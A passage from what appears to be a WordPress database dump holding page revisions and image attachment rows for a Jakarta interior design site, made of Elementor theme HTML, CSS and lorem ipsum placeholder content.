r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 11:27:13','2023-05-25 11:27:13','',22,'https://bauhaus.futuremediatrix.com/?p=4786',0,'revision','',0),(4787,2,'2023-05-30 08:13:59','2023-05-30 08:13:59','','IMG-1065','','inherit','open','closed','','img-1065','','','2023-05-30 08:13:59','2023-05-30 08:13:59','',22,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg',0,'attachment','image/jpeg',0),(4788,2,'2023-05-30 08:14:01','2023-05-30 08:14:01','','IMG-2927','','inherit','open','closed','','img-2927','','','2023-05-30 08:14:01','2023-05-30 08:14:01','',22,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg',0,'attachment','image/jpeg',0),(4790,2,'2023-05-30 08:14:41','2023-05-30 08:14:41','','IMG-9402','','inherit','open','closed','','img-9402','','','2023-05-30 08:14:41','2023-05-30 08:14:41','',22,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg',0,'attachment','image/jpeg',0),(4791,2,'2023-05-30 08:27:42','2023-05-30 08:27:42','','IMG-2927c','','inherit','open','closed','','img-2927c','','','2023-05-30 08:27:42','2023-05-30 08:27:42','',22,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c.jpg',0,'attachment','image/jpeg',0),(4792,2,'2023-05-30 08:28:59','2023-05-30 08:28:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-30 08:28:59','2023-05-30 08:28:59','',22,'https://bauhaus.futuremediatrix.com/?p=4792',0,'revision','',0),(4793,2,'2023-05-30 08:28:59','2023-05-30 08:28:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" 